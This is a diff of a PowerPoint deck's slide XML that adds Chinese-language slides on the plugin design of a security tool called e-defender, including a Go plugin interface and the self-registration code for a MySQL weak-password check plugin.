+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>result.Request</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>resp.RequestRaw</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = append(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, result)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      return true</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>}</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2994534069"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide23.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="标题 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6FE0BDB-C419-7247-93CF-C74DF4D7491C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913775" y="618518"/>
+            <a:ext cx="10364452" cy="583982"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>插件化</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="文本框 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40B0B526-043D-2B47-A559-25A0442DBE05}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1816274" y="1490597"/>
+            <a:ext cx="8880953" cy="5078313"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>e-defender</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>和一个比较核心的特性就是插件化，可以支持平滑的拓展，如果有新的功能想要加入，只需要在</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>plugin/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>goPlugins</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>中添加相关函数即可，新添加的这个对象只要实现了如下接口，就是一个可用的插件</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>// </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>GoPlugin</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>插件接口</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>type </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>GoPlugin</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> interface {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   Init() Plugin</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   Check(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>netloc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> string, meta </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>TaskMeta</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>) bool</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>GetResult</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>() []Plugin</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
+              <a:t>插件</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>采用自注册的模式，这里使用了</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>go</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>语言的一个语法特性，在包初始化的时候将自己注册到</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>pulgin</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>树，如下是</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>mysql</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>弱密码检测插件自注册的代码</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>func</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>init</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>() {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>plugin.Regist</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>("</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>mysql</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>", &amp;</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>mysqlWeakPass</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>{})</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>}</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2395209562"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide24.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
           <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
@@ -9729,7 +10109,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide21.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide25.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
